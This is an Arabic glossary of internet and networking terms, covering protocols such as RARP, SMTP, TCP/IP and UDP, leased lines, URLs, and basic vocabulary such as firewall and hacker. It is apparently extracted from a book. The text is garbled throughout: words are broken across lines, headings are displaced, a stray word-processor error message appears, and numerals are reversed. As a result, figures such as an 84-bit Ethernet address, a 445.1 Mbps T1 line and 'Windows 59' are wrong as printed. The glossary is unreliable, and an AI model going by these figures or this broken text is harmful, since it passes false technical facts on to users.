‫‪)RARP‬بروتوكول الحل العكسي للعنوان)‪ ‬‬ ‫(‪(Reverse Address Resolution Protocol‬بروتوكول‪ ‬‬ ‫إنترنت الذي يسمح بتحويل عناوين الشبكة الفیزيائیة‪ ‬‬ ‫(عنوان إثرنت مؤلف من ‪ 84‬بت مث ً) إلى عناوين ‪ IP‬‬ ‫ل‪ ‬‬ ‫بإرسالھا إلى مزود ‪ RARP.‬يستخدم ھذا البروتوكول‪ ‬‬ ‫من قبل محطات العمل المجردة من أقراص التخزين‪ ،‬‬ ‫لتحديد عناوين ‪ IP‬الخاصة بھا لدى شروعھا بالعمل‪ .‬‬ ‫انظر‪ ARP.‬‬ ‫‪ (Request for Comments)RFC‬‬ ‫مجموعة من الوثائق التي يمكن الوصول إلیھا عبر‪ ‬‬ ‫إنترنت‪ ،‬تحتوي على مواصفات قیاسیة ومقترحات‪ ،‬‬ ‫وعلى غیرھ ا من المعلومات عن تقنیات إنترنت‪ .‬ويمكن‬ ‫استجلب ھذه الوثائق من مواقع ‪ FTP‬التي تحتوي‪ ‬‬ ‫علیھا ( مثل موقع ‪ InterNIC‬على العنوان‪ ‬‬ ‫( ‪ds.internic.net‬بدون استخدام كلمة سر‪ .‬كما‪ ‬‬ ‫يمكن طلبھ ا بواسطة البريد اللكتروني من العنوان‪ ‬‬ ‫‪ ) .(mailserv@ds.internic.com‬‬ ‫‪)Router‬موجة)‪ ‬‬ ‫جھ از‪ ،‬أو برنامج‪ ،‬يمكنه استقبال حزم البیانات من‪ ‬‬ ‫شبكة‪ ،‬أو شبكة فرعیة‪ ،‬أو كمبیوتر‪ ،‬لیقوم بتمريرھا‪ ‬‬ ‫عبر المسار الملئم‪ ،‬باتجاه ھدفھا‪ .‬ستحتاج لستخدام‬ ‫موجه‪ ،‬إذا كانت لديك شبكة خاصة متصلة بإنترنت‪ ،‬أو‪ ‬‬ ‫كنت تعامل كمبیوترك كما لو كان شبكة‪ ،‬عند اتصالك‪ ‬‬ ‫بالجھ ة التي تزودك بخدمة التصال بإنترنت بواسطة‪ ‬‬ ‫خط‪ ، ISDN‬أو عبر خط مؤجر‪ .‬وحیث أن على الموجه‪ ‬‬ ‫أن يقوم بفحص عنوان وجھة البیانات التي يتلقاھا‪ ،‬‬ ‫وإيجاد أفضل مسار تسلكه للوصول إلى ھذه الوجھة‪ ‬‬ ‫بأسرع ما يمكن‪ ،‬فإن ثمنه يزيد‪ ،‬عادة‪ ،‬على ثمن مودم‬ ‫بسیط أو بطاقة شبكة‪ .‬وتحتاج النواع المتقدمة من‪ ‬‬ ‫الموجھ ات التي تستخدم للربط بین الشبكات الكبیرة‪ ،‬‬ ‫إلى وحدات تخزين‪ ،‬وھي تكلف أكثر‪ .‬‬ ‫جھ از ينظم حركة المرور بین الشبكات‪ .‬ترتكز قرارات‪ ‬‬ ‫‪)Router‬المفرع)‪ ‬‬ ‫إرسال البیانات التي يتخذھا "المفرع" على معلومات‪ ‬‬ ‫طبقة الشبكة وجداول التفريع‪ ،‬التي يتم إنشاؤھا‪ ،‬‬ ‫ب‪ ،‬بواسطة بروتوكولت التفريع‪ .‬‬ ‫غال ً‬ ‫ا‪ ‬‬ ‫‪ 065‬‬ ‫‪ )(S‬‬ ‫‪)Search Engine‬محرك بحث)‪ ‬‬ ‫يستخدم ھذا المصطلح في سیاق الحديث عن‪ ‬‬ ‫شبكة ويب‪ ،‬للشارة إلى المواقع التي توفر خدمات‪ ‬‬ ‫البحث عن المعلومات‪ ،‬بالعتماد على كلمات‪ ‬‬ ‫مفتاحیة‪ ، keywords‬أو عبارات معینة‪ .‬وتقوم آلة‪ ‬‬ ‫البحث‪ ،‬عادة‪ ،‬بالبحث عن الكلمات التي يدخلھا‪ ‬‬ ‫المستخدم في قاعدة للبیانات تكون قد أنشأتھا‪ ‬‬ ‫ق‪ ،‬بواسطة برنامج يدعى‪ ، spider‬التي تعني ا‪ ‬‬ ‫مسب ً‬ ‫"العنكبوت"‪ .‬وتقوم مثل ھذه البرامج بالتجوال الدائب‪ ‬‬ ‫في شبكة ويب‪ ،‬لتنظیم محتوياتھا من النصوص في‪ ‬‬


‫فھارس ضخمة‪ ،‬تضم الكلمات وعناوين الصفحات‪ ‬‬ ‫التي تحتوي علیھا ‪.‬لكن‪ ،‬بسبب التساع الھائل‪ ‬‬ ‫لشبكة ويب‪ ،‬والتبدل المستمر في محتوياتھا‪ ،‬فقد‪ ‬‬ ‫تحتوي النتائج التي تعود بھا آلت البحث‪ ،‬على‪ ‬‬ ‫العديد من الوصلت التي ل تفضي إلى صفحات‪ ‬‬ ‫تحتوي على المعلومات المطلوبة‪ .‬‬ ‫‪)Server‬مزود)‪ ‬‬ ‫كمبیوتر يزود الكمبیوترات المتصلة به‪ ،‬بالملفات‪ ‬‬ ‫والمعلومات ‪.‬تتضمن مزودات إنترنت الشائعة‪ ،‬‬ ‫مزودات الملفات‪ ،‬ومزودات خدمات أسماء النطاق )‪ ‬‬ ‫‪ .) domain names‬‬ ‫‪)Signature File‬ملف التوقیع)‪ ‬‬ ‫ی إلى نھاية كل‪ ‬‬ ‫ملف آسكي ( ‪ ( ASCII‬يضاف آل ً‬ ‫ا‪ ‬‬ ‫رسالة بريد إلكتروني‪ ،‬عند إرسالھا‪ ،‬ويستخدم‪ ‬‬ ‫للتعريف عن المرسل‪ ،‬ولكن بشكل غیر رسمي‪ ،‬‬ ‫وغیر موثوق ) يجب استخدام التواقیع الرقمیة لثبات‬ ‫ھوية المرسل‪ ،‬وصحة البیانات‪ ،‬عند اللزوم ‪ (.‬تدعم‪ ‬‬ ‫معظم برامج البريد اللكتروني ملفات التواقیع‪ ،‬حیث‪ ‬‬ ‫تسمح للمستخدم بكتابة أي معلومات في ھذا‪ ‬‬ ‫ل‬ ‫الملف‪ ،‬من ضمنھا‪ .‬ويضع المستخدمون‪ ،‬عادة‪ ،‬أقوا ً‬ ‫مأثورة‪ ،‬أو يشكلون بعض الصور البسیطة بالعتماد‪ ‬‬ ‫على الحرف البجدية وعلمات الترقیم والرموز‪ ‬‬ ‫الخاصة‪ ،‬بالضافة إلى اسم المستخدم وعمله‪ ‬‬ ‫وعنوانه وأرقام التصال به‪ .‬‬ ‫‪)SLIP‬بروتوكول الخط التسلسلى لنترنت)‪ ‬‬ ‫(‪(Serial Line Internet Protocol‬بروتوكول لتحقیق‪ ‬‬ ‫التصال بإنترنت بواسطة إدارة رقم ھاتفي‪ ، dial­up‬‬ ‫ا‪ ‬‬ ‫ف‪ ‬‬ ‫وھو مستخدم على نطاق واسع‪ ،‬ولكنه بات متخل ً‬ ‫بعض الشيء‪ .‬ويعد ‪ SLIP‬من الناحیة التقنیة‪ ،‬‬ ‫بروتوكو ً يعتمد تأطیر الحزمة ‪ packet­ framing‬‬ ‫ل‪ ‬‬ ‫في تحديد كیفیة إنشاء وإرسال ُزم ‪ IP‬عبر خط‪ ‬‬ ‫ح‪ ‬‬ ‫بیانات تسلسلي‪ ،‬مثل الخط الھاتفي الواصل بین‪ ‬‬ ‫المودم المتصل بكمبیوترك ومزود إنترنت‪ .‬انظر‪ ، IP‬و‪ ‬‬ ‫‪ 165‬‬ ‫‪PPP‬و‪ PPTP.‬‬ ‫‪)SMTP‬البروتوكول البسیط لنقل البريد)‪ ‬‬ ‫( ‪( Simple Mail Transfer Protocol‬بروتوكول من‪ ‬‬ ‫مجموعة‪ ، TCP/IP‬يستخدم لنقل النصوص أثناء‪ ‬‬ ‫تبادل الرسائل عبر إنترنت ‪.‬وھو نسخة مبسطة عن‪ ‬‬ ‫بروتوكول ‪ MTP.‬يحدد بروتوكول ‪ SMTP‬ھیئة وطريقة‬ ‫ض ‪ MIME‬و‬ ‫تبادل البیانات بین مزودات البريد‪ .‬انظر أي ً‬ ‫ا‪ ‬‬ ‫‪ .POP‬‬ ‫‪ 265‬‬ ‫‪ )(T‬‬


‫‪ 1T‬‬ ‫خط مؤجر للتصال بإنترنت‪ ،‬تصل سرعة نقل البیانات‬ ‫عبره إلى ‪ 445.1‬میجابت في الثانیة‪ .‬تتوفر مثل ھذه‬ ‫الخطوط‪ ،‬عادة للشركات الكبیرة والجامعات‪ .‬‬ ‫‪ 3T‬‬ ‫خط مؤجر فائق السرعة للتصال بإنترنت‪ ،‬تصل‪ ‬‬ ‫سرعة نقله إلى ‪ 54‬میجابت في الثانیة‪ .‬‬ ‫‪)Targetting‬التوجیه)‪ ‬‬ ‫شراء مساحات إعلنیة على مواقع ويب يقصدھا‪ ‬‬ ‫جمھ ور محدد من المستخدمین‪ ،‬اعتماد ً على‪ ‬‬ ‫ا‪ ‬‬ ‫المعلومات البشرية‪-‬الجغرافیة (‪ (demographic‬التي‬ ‫يقدمھا الموقع‪ ،‬مثل الجنس‪ ،‬وفئة العمر‪ ،‬‬ ‫والھتمامات‪ ،‬ومعدل الدخل‪ ...‬‬ ‫‪ TCP/IP‬‬ ‫مجموعة من بروتوكولت إنترنت تتضمن‪ ، TCP‬و‪ ، IP‬و‬ ‫‪ Transmission Control Protocol/Internet‬‬ ‫‪ ،UDP‬و‪ ، RARP، ARP‬و ‪ ICMP‬وغیرھا الكثیر‪ .‬ويمكن‬ ‫‪ )(Protocol‬‬ ‫لھذه البروتوكولت التي توصف بأنھا ال ِراء الذي يشد‬ ‫غ‪ ‬‬ ‫أجزاء إنترنت بعضھ ا إلى بعض‪ ،‬أن تحقق الربط بین‪ ‬‬ ‫ی بصور مباشرة‪ ،‬‬ ‫شبكات متباعدة وغیر متصلة فیزيائ ً‬ ‫ا‪ ‬‬ ‫لتشكل معً شبكة افتراضیة واحدة أو ما يسمى‪ ‬‬ ‫ا‪ ‬‬ ‫"إنترنت‪ ".‬‬ ‫‪)TCP/IP‬المكدس)‪ ‬‬ ‫كي يستطیع الكمبیوتر استخدام بروتوكول بشكل‪ ‬‬ ‫مناسب‪ ،‬يجب أن يتوفر فیه مكدس ‪ TCP/IP.‬يتألف‪ ‬‬ ‫مكدس من برمجیات‪ ، TCP/IP‬وبرمجیات المقابس (‪ ‬‬ ‫مثل ‪ WINSOCK.DLL‬لكمبیوترات ويندوز )‪ ،‬وبرمجیات‬ ‫قیادة الجھ زة‪ ،‬التي تعرف ببرمجیات قیادة الحزم )‪ ‬‬ ‫‪packet drivers (.‬يأتي ويندوز ‪ ،59‬مع مكدس‪ ‬‬ ‫ن الصدارة ‪ 1.1‬من‪ ‬‬ ‫الخاص بمايكروسوفت‪ ،‬متضم ً‬ ‫ا‪ ‬‬ ‫مايكروسوفت‪ ، WINSOCK.DLL‬وبرامج قیادة الحزم‪ .‬‬ ‫‪)TCP‬بروتوكول التحكم بالنقل)‪ ‬‬ ‫( ‪(Transmission Control Protocol‬أحد بروتوكول‪ ‬‬ ‫مجموعة‪ ، TCP/IP‬الذي يوفر وسیلة موثوقة لنقل‪ ‬‬ ‫البیانات عبر إنترنت ‪.‬وبفضل بروتوكول‪ ، TCP‬يمكن‪ ‬‬ ‫لكمبیوتر زبون متصل بإنترنت‪ ،‬أن يقیم صلة افتراضیة‬ ‫ا‪ ‬‬ ‫ف‪ ‬‬ ‫مع كمبیوتر زبون آخر‪ ،‬وتبادل البیانات عبرھا‪ .‬وخل ً‬ ‫لبروتوكول‪ ، UDP‬يوفر برتوكول ‪ TCP‬طريقة مضمونة‪ ‬‬ ‫في تراسل البیانات‪ ،‬حیث يعاد إرسال ُزم البیانات‪ ‬‬ ‫ح‪ ‬‬ ‫الضائعة أو التالفة حتى تسلمھا بشكل صحیح‪ ،‬أي‪ ‬‬ ‫بتطابق البیانات المستقبلة مع البیانات المرسلة‪ .‬‬ ‫انظر‪ UDP.‬‬


‫‪ 365‬‬ ‫‪)Telnet‬التلنت)‪ ‬‬ ‫بروتوكول إنترنت القیاسي للتصال بالطرفیات البعیدة‬ ‫‪( remote terminate (.‬تتوفر زبائن بروتوكول‪ ‬‬ ‫"تلینت ( ‪" ( Telnet client‬لمعظم منصات العمل‪ .‬‬ ‫عندما تستخدم "تلینت" للتصال بأحد مواقع‪ ‬‬ ‫"يونیكس"‪ ،‬مث ً‪ ،‬تستطیع إصدار أوامر مشابھة‪ ‬‬ ‫ل‪ ‬‬ ‫لوامر دوس ( مثل‪ ، LIST‬و‪ ، DELE‬و‪ ، USER‬الخ( ‪ ،‬‬ ‫ی‪ .‬‬ ‫وكما لو كان الموقع كمبیوتًر محل ً‬ ‫ا‪ ‬‬ ‫ا‬ ‫نسخة مبسطة من بروتوكول تخلو من إمكانیة‪ ‬‬ ‫‪ (Trivial File Transfer Protocol)TFTP‬‬ ‫التدقیق في الھ وية باستخدام كلمة السر‪ ،‬وتعتمد‪ ‬‬ ‫في نقل البیانات على بروتوكول ‪ UDP‬بد ً من ‪ TCP.‬‬ ‫ل‪ ‬‬ ‫يمتاز بروتوكول ‪ TFTP‬بالبساطة والسھولة‪ ،‬مقارنة‪ ‬‬ ‫مع ‪ . FTP‬‬ ‫اسم آخر للكابلت من نوع ‪Base­T. 01‬ويمكن أن‪ ‬‬ ‫‪)Twisted Pair‬كابلت زوجیة ملتفة)‪ ‬‬ ‫ض أي نوع من الكوابل التي تحتوي على‪ ‬‬ ‫تعني أي ً‬ ‫ا‪ ‬‬ ‫أزواج مفتولة ومنفصلة من السلك‪ .‬تتألف أزواج‪ ‬‬ ‫النوع‪ ، 10Base­T‬من السلك ‪ 2+1‬و ‪ ،6+3‬ويمكن‪ ‬‬ ‫بھذا إعداد الكابلت المتصالبة بوصل السلك ‪ 1‬مع ‪ 3‬‬ ‫والسلك ‪ 2‬مع ‪ .6‬‬ ‫‪ 465‬‬ ‫‪ ) (U‬‬ ‫( ‪( User Datagram Protocol‬أحد بروتوكولت يسمح‬ ‫‪)UDP‬بروتوكولت جزئیات بیانات‬ ‫المستخدم)‬ ‫بنقل حزم أو جزئیات ( ‪ ( datagram‬من البیانات‪ ،‬بین‪ ‬‬ ‫ف لبروتوكول‪ ، TCP‬ل يحتاج‪ ‬‬ ‫تطبیقات إنترنت‪.‬وخل ً‬ ‫ا‪ ‬‬ ‫المرسل والمستقبل في بروتوكول‪ ، UDP‬إلى تأسیس‬ ‫الصلة بینھما بشكل مسبق قبل الشروع بتراسل‪ ‬‬ ‫ق‪ ،‬فھو ل يضمن‪ ‬‬ ‫البیانات‪ .‬ول يعد بروتوكول ‪ UDP‬موثو ً‬ ‫ا‪ ‬‬ ‫وصول جزئیات البیانات بالتسلسل الذي أرسلت به‪ ،‬بل‬ ‫أنه ل يضمن أبد ً وصول ھذه الجزيئات‪ .‬وإذا كانت‪ ‬‬ ‫ا‪ ‬‬ ‫العتمادية مطلوبة‪ ،‬فیجب تحقیقھا من خلل‪ ‬‬ ‫التطبیقات التي تستخدم ‪ UDP‬‬ ‫( ‪(Uniform Resource Locator‬مؤشر يدل على مكان‬ ‫‪)URL‬عنوان الموارد الموحد)‬ ‫وجود صفحة‪ ،‬أو أي نوع آخر من الموارد‪ ،‬ضمن فضاء‪ ‬‬ ‫شبكة ويب‪ .‬وأصبح من الشائع استخدام ھذا النوع من‬ ‫العناوين في بطاقات رجال العمال والعلنات‪ ،‬كمرجع‪ ‬‬ ‫لصفحات ذات صلة‪ ،‬في شبكة ويب ‪.‬وتتیح متصفحات‪ ‬‬ ‫ويب التوجه مباشرة إلى عنوان ‪ URL‬معین‪ ،‬بإدخال‪ ‬‬ ‫ب ما يتم‪ ‬‬ ‫نص ھذا العنوان في نافذة خاصة‪ .‬لكن غال ً‬ ‫ا‪ ‬‬


‫التوجه إلى الصفحات التي تشیر إلیھا عناوين ‪ URL‬‬ ‫بالنقر علیھ ا بالماوس‪ ،‬ضمن قائمة بالمواقع المختارة‪ ،‬‬ ‫أو في وصلة تشعبیة ‪ hyperlink‬تتضمن العنوان في‪ ‬‬ ‫صفحة أخرى‪ .‬يبدأ عنوان‪ ، URL‬عادة‪ ،‬بتحديد البرتوكول‬ ‫الواجب استخدامه للوصول إلى الصفحة التي يشیر‪ ‬‬ ‫إلیھا‪ ،‬مثل بروتوكول ‪ http‬المستخدم في الوصول إلى‬ ‫صفحات ويب‪ ،‬أو بروتوكول ‪ ftp‬لنقل الملفات من وإلى‪ ‬‬ ‫مواقع ‪ FTP.‬يلي ذلك فاصل ( "‪ ،) "//‬ثم عنوان المزود‪ ‬‬ ‫‪server‬الذي يحتوي على الصفحة‪ ،‬مثل !‪ ( Error‬‬ ‫‪ ،Bookmark not defined.‬متبوع ً بالمسار الذي يقود‪ ‬‬ ‫ا‪ ‬‬ ‫إلى الصفحة المشار إلیھا ضمن نظام الملفات الخاص‪ ‬‬ ‫بالمزود‪ ،‬وصو ً إلى اسم الملف وامتداد السم‪ ‬‬ ‫ل‪ ‬‬ ‫‪ 565‬‬ ‫‪ ) (V‬‬ ‫‪ (Virtual Reality Modeling Language)VRML‬المقابل ثلثي البعاد ‪ #­D‬للغة ‪ ، HTML‬وھي لغة‪ ‬‬ ‫مفسرة تسمح بوصف مشاھد ثلثیة البعاد غنیة‪ ،‬‬ ‫باستخدام ملفات نصوص بسیطة‪ ،‬يمكن عرضھا بواسطة‬ ‫متصفحات تدعم لغة ‪ VRML.‬وتحل لغة ‪ VRML‬مشكلة‪ ‬‬ ‫بطء تطبیقات الملتیمیديات على الشبكات‪ ،‬والناتجة عن‪ ‬‬ ‫حاجة ھذه التطبیقات إلى نقل أعداد كبیرة من ملفات‪ ‬‬ ‫الصور عبر الشبكة‪ ،‬بالكتفاء بنقل ملف نصوص بسیط‪ ‬‬ ‫بلغة‪ ، VRML‬وإلقاء مھمة تولید المشاھد ثلثیة البعاد‪ ‬‬ ‫على عاتق المتصفح ‪ .‬‬ ‫‪ 665‬‬ ‫‪ ) (W‬‬ ‫خدمة معلومات موزعة‪ ،‬وأداة بحث تسمح‪ ‬‬ ‫‪)WALS‬خدمة معلومات المناطق الواسعة)‬ ‫باستخدام اللغات الطبیعیة والفھارس في عملیات‬ ‫البحث‪ .‬يستخدم العديد من أدوات البحث في‪ ‬‬ ‫إنترنت‪ ،‬محرك ‪ WAIS‬للبحث عن المعلومات‪ .‬‬ ‫اختصار لعبارة ‪ ، Windows Socets‬أي مقابس‪ ‬‬ ‫‪)Winsocks‬مقابس الويندوز)‬ ‫ويندوز‪ .‬تشیر عبارة ‪ Winsocks‬إلى مجموعة من‪ ‬‬ ‫الموصفات القیاسیة للمبرمجین الذين يطورون‪ ‬‬ ‫تطبیقات ضمن بیئة ويندوز‪ .‬‬ ‫عالم افتراضي يتكون من مزودات ‪ HTTP‬في‪ ‬‬ ‫إنترنت‪ ،‬تحتوي على صفحات ذات ھیئات غنیة‪ ‬‬ ‫‪(World Wide Web)WWW‬‬ ‫‪HTML‬يمكن جلبھا بواسطة متصفحات ويب‪ ،‬مثل‬ ‫مايكروسوفت إنترنت إكسبلورر‪ ،‬ونتسكیب‪ ‬‬ ‫نافیجیتور‪ .‬ومن الشائع الشارة إلیھا بكلمة ويب‪ ‬‬ ‫للختصار‪ .‬نشأت ھذه الشبكة العام ‪ ، 2991‬‬ ‫وازدادت شعبیتھا بفضل انتشار متصفحات ويب )‪ ‬‬ ‫( ‪Browsers Web‬سھ لة الستخدام انظر (‪HTML‬‬ ‫‪ ،‬و‪ ، HTTP‬و‪ ( VRML‬‬ ‫‪ 765‬‬ ‫مصطلحات شائعة‪ ‬‬ ‫‪ (A‬‬ ‫‪ ­ Administrator‬المدير‪ ‬‬ ‫شخص يقوم بإعداد مصادر الشبكة وتسجیل المستخدمین وأرقامھم‪ ‬‬ ‫السرية وصیانة المصادر‪ .‬‬


‫‪ ­ Agent‬عمیل‪ ‬‬ ‫في نظام (العمیل‪/‬الموفر) (‪ ، (Client/Server‬ذلك الجزء من النظام‪ ‬‬ ‫الذي ينفذ عملیة إعداد وتبادل المعلومات نیابة عن برنامج المضیف‪ ‬‬ ‫‪ Host‬أو الموفر ‪ .Server‬‬ ‫‪ ­ Alert‬تحذير‪ ‬‬ ‫تقرير عن وجود خطأ بشكل صندوق تحذير أو صوت يطلقه الكمبیوتر‪ .‬‬ ‫‪ ­ ASCII‬قاعدة المعايیر المريكیة لتبادل المعلومات‪ ‬‬ ‫‪ Standard Code for Information Interchange American‬معیار لتحويل‪ ‬‬ ‫الحرف إلى أرقام وتحتوي على سبعة جزيئات بقیمة ثنائیة تتراوح بین‬ ‫الصفر و ‪ .721‬‬ ‫‪ ­ Anonymous‬مجھول‪ ‬‬ ‫يتم استخدامه كاسم مستخدم للدخول على بعض الكمبیوترات‪ ‬‬ ‫البعیدة‪ .‬‬ ‫‪ ­ Authentication‬التوثیق‪ ‬‬ ‫تعريف ھ وية شخص أو الجراءات الخاصة بذلك‪ .‬‬ ‫‪ 865‬‬ ‫‪ (B‬‬ ‫‪ ­ Band Width‬عرض النطاق‪ ‬‬ ‫ھي كمیة المعلومات التي يمكنك إرسالھا على خط معین في وقت‪ ‬‬ ‫محدد‪ .‬عرض النطاق يقاس بعدد النبضات في الثانیة ‪ Bits per Second‬‬ ‫وتكتب (‪ .(bps‬‬ ‫‪ ­ BBS‬لوحة إعلنات النظام‪ ‬‬ ‫كمبیوتر مزود ببرامج معینة يوفر رسائل إلكترونیة وملفات إضافة‪ ‬‬ ‫للخدمات الخرى‪ .‬‬ ‫‪ ­ Binary‬ثنائي‪ ‬‬ ‫وسیلة عد تستخدم الرقمین ‪ 0‬و ‪ ، 1‬وھي الوسیلة التي يعمل بھا‪ ‬‬ ‫الكمبیوتر داخلی ً‪ ،‬وتحتوي الملفات الثنائیة على ثمان جزئیات تتراوح‪ ‬‬ ‫ا‪ ‬‬ ‫بین صفر و ‪ 552‬‬ ‫‪ ­ Browser‬متصفح‪ ‬‬ ‫برنامج يستخدم للبحار في الشبكة العنكبوتیة ‪ .WWW‬‬ ‫‪ (C‬‬ ‫‪ ­ Client‬تابع‪ ‬‬ ‫جھ از كمبیوتر يقوم بطلب الخدمة من جھاز كمبیوتر آخر‪ ،‬فعندما يطلب‬ ‫كمبیوتر اشتراك مع موفر خدمة ‪ ISP‬فإنه يعتبر تابع لموفر الخدمة‪ ‬‬ ‫‪ ).(Client of ISP‬‬ ‫‪ ­ Compression‬ضغط‪ ‬‬ ‫خطوات ضغط المعلومات لتخزين الملف في مساحة أصغر‪ .‬‬ ‫‪ ­ Connection‬ربط‪ ‬‬ ‫وسیلة اتصال بین جھازي كمبیوتر‪ .‬‬ ‫‪ 965‬‬ ‫‪ ­ Crack‬تخريب‪ ‬‬ ‫مصطلح يطلق على برنامج يقوم بفك شفرة أحد البرامج المشتركة‪ ‬‬ ‫وجعله مجاني‪ .‬‬ ‫‪ ­ Cracker‬مخرب‪ ‬‬ ‫شخص يحاول الدخول على نظام ما دون تصريح ويسبب له أضرار‪ .‬‬ ‫‪ (D‬‬ ‫‪ ­ Data‬بیانات‪ ‬‬ ‫معلومات وبشكل خاص المعلومات المستخدمة بواسطة البرامج‪ ،‬‬ ‫أصغر وحدة في المعلومة يمكن للكمبیوتر فھمھا ھي ‪ .bit‬‬


‫‪ ­ Default‬بديل افتراضي‪ ‬‬ ‫قیمة أو فعل أو ترتیب يقوم الكمبیوتر بافتراضه في حال عدم قیام‪ ‬‬ ‫المستخدم بإعطاء تعلیمات صريحة بخلف ذلك‪ .‬ھذا النظام يمنع‪ ‬‬ ‫البرنامج من التعطل أو الصطدام في حال عدم إعطاء قیمة بواسطة‬ ‫المستخدم‪ .‬‬ ‫‪ ­ Device‬جھاز‪ ‬‬ ‫‪ .1‬‬ ‫الجزاء التي يتركب منھا الكمبیوتر ‪ Hardware‬مثل الشاشة‬ ‫والطابعة وخلفه‪ ،‬ھ ذه الجزاء يمكن أن يطلق علیھا أيض ً الجزاء‪ ‬‬ ‫ا‪ ‬‬ ‫الخارجیة ‪ Peripheral‬لنھا منفصلة بصورتھ ا المادية عن الكمبیوتر‪ ‬‬ ‫ولكنھا مربوطة به‪ .‬‬ ‫‪ .2‬‬ ‫جزء من الكمبیوتر أو قطعة من الجھزة الخارجیة التي يمكنھا‬ ‫نقل المعلومات‪ .‬‬ ‫‪.3‬‬ ‫أي قطع أو معدات يمكن ربطھ ا بالشبكة مثل الكمبیوتر والطابعة‬ ‫وموفر الملفات وموفر الطابعة وخلفه‪ .‬‬ ‫‪ 075‬‬ ‫‪ ­ Dial­up‬اتصال‪ ‬‬ ‫استخدام التلیفون أو ‪ ISDN‬لربط الكمبیوتر باستخدام مودم بخدمة‪ ‬‬ ‫النترنت‪ .‬وھي عكس التباط المستمر ‪ Permenant Connection‬وھذا‪ ‬‬ ‫يعني أنه كي تحصل على الخدمة فإنه علیك أن تعمل مكالمة ھاتفیة‪.‬‬ ‫‪ ­ Domain‬حقل‪ ‬‬ ‫ھو ذلك الجزء من الـ ‪ DNS‬الذي يحدد مكان شبكة كمبیوترك وموقعھا‪ ‬‬ ‫في العالم‪ .‬‬ ‫‪ ­ DNS‬نظام أسماء الحقول‪ ‬‬ ‫‪ Domain Name System‬ھو نظام لتحديد العناوين الشبكیة ‪ IP Addresses‬‬ ‫المطابقة للكمبیوترات المسماة والحقول ‪ ..Domains‬الـ ‪ DNS‬يتكون من‪ ‬‬ ‫سلسلة من المعلومات تفصل بینھا نقاط‪ ...‬خدمة أسماء الحقول‪ ‬‬ ‫‪ Domain Name Service‬ھي عبارة عن برنامج يقوم بتحويل أسماء‪ ‬‬ ‫الحقول ‪ Names Domain‬إلى عناوين شبكیة ‪ .IP Addresses‬‬ ‫‪ (E‬‬ ‫‪ Electronic Mail‬البريد اللكتروني‪ ‬‬ ‫يرمز له ‪ e­mail‬وھ و نظام يمكن بموجبه لمستخدم الكمبیوتر تبادل‪ ‬‬ ‫الرسائل مع مستخدم آخر أو مجموعة مستخدمین بواسطة شبكة‪ ‬‬ ‫اتصال‪ ،‬ويحتاج البريد اللكتروني إلى برنامج بريد مثل‪ Outlook :‬أو‪ ‬‬ ‫‪ Eudora‬لیتمكن من الرسال‪ .‬‬ ‫‪ ­Emotion‬رموز المشاعر‪ ‬‬ ‫رموز تستخدم للتعبیر عن المشاعر على النترنت مثل « ابتسامة ‪ ، ):‬‬ ‫غضب ‪ » (:‬‬ ‫‪ ­ Encryption‬التشفیر‪ ‬‬ ‫‪ 175‬‬ ‫ھو معالجة كتلة من المعلومات بھ دف منع أي شخص من قراءة تلك‪ ‬‬ ‫المعلومة باستثناء الشخص المقصود إرسالھا إلیه‪ ،‬وھناك العديد من‬ ‫أنواع التشفیر‪ .‬‬ ‫‪ (F‬‬ ‫‪ ­ FAQs‬السئلة المتكررة‪ ‬‬ ‫‪ Questions Frequently Asked‬وثیقة على النترنت الغرض منھا فحص‪ ‬‬ ‫وتدقیق المعلومات التي يحتاج إلیھا الكثیر من الشخاص بصفة‪ ‬‬ ‫متكررة‪ .‬‬ ‫‪ ­ Firewall‬جدار نار‪ ‬‬ ‫نظام تأمین لتقیید عملیة الدخول على الكمبیوترات الموجودة على‪ ‬‬


‫شبكة محلیة ‪ LAN‬من أي مكان في الخارج‪ .‬‬ ‫‪ ­ Flame‬التطھیر‪ ‬‬ ‫ردة فعل غاضبة لرسالة تم نشرھا على ‪ Usenet‬أو القوائم البريدية‪ ‬‬ ‫‪ Mailing List‬أو لوحات النقاش ‪ ، Message Boards‬التطھیر يحدث لعدة‪ ‬‬ ‫أسباب مثل تعمیم رسالة على النترنت أو طرح سؤال توجد إجابته‪ ‬‬ ‫في الـ ‪ ،FAQs‬حرب التطھیر قد تحدث عندما يرد شخص تعرض‪ ‬‬ ‫للتطھیر على الرسالة أو الرسائل التي وصلته‪ .‬‬ ‫‪ (G‬‬ ‫‪ ­ Gateway‬بوابة‪ ‬‬ ‫مصطلح (بوابة ‪ (Gateway‬لم يعد يستخدم حالی ً ‪ ،‬والبوابة ھي أداة أو‬ ‫ا‪ ‬‬ ‫برنامج اتصال يقوم بتسییر المعلومات من شبكة إلى أخرى‪ .‬‬ ‫‪ ­ Gopher‬خدمة جوفر‪ ‬‬ ‫نظام طورته جامعة مینیسوتا المريكیة بھدف تسھییل عملیة‪ ‬‬ ‫استخدام النترنت وھو يعتمد على عملیة البحث من خلل القوائم‪ ‬‬ ‫لقراءة الوثائق ونقل الملفات‪ Gopher .‬يمكنه الشارة الى الملفات‪ ‬‬ ‫ومواقع ‪ Telnet‬ومراكز معلومات ‪ WAIS‬وغیرھا‪ .‬‬ ‫‪ 275‬‬ ‫‪ (H‬‬ ‫‪ ­ Hacker‬متطفل‪ ‬‬ ‫المتطفل ھ و الشخص الذي يشعر بالفخر لمعرفته بطرق العمل‪ ‬‬ ‫الداخلیة للنظام أو الكمبیوتر أو الشبكات بحیث يسعى للدخول علیھا‪ ‬‬ ‫دون تصريح‪ .‬‬ ‫‪ ­ Host‬مضیف‪ ‬‬ ‫غالب ً ما يستخدم مصطلح ( مضیف ‪ (Host‬للكمبیوتر الذي يتیح‪ ‬‬ ‫ا‪ ‬‬ ‫للمستخدمین الدخول علیه‪ .‬‬ ‫‪ ­ HTTP‬بروتوكول نقل النص التشعبي‪ ‬‬ ‫‪ HTTP‬ھي وسیلة تجعل من الممكن التصفح عبر وثائق الشبكة‪ ‬‬ ‫العنكبوتیة‪ ،‬المستخدم يضغط على نقاط ربط موجودة على وثیقة‪ ‬‬ ‫الشبكة العنكبوتیة مما يمكنه من الذھاب إلى تلك الوثیقة حتى لو‪ ‬‬ ‫كانت موجودة على جھاز آخر‪ .‬‬ ‫‪ (I‬‬ ‫‪ ­ ISDN‬الشبكة الرقمیة للخدمات الموحدة‪ ‬‬ ‫‪ Services Digital Network Intergrated‬ھي تكنولوجیا جديدة تحتوي‪ ‬‬ ‫على شبكات صوتیة ورقمیة في وسیلة واحدة وتعتبر خدمة اتصالت‪ ‬‬ ‫فائقة السرعة‪ .‬‬ ‫‪ ­ 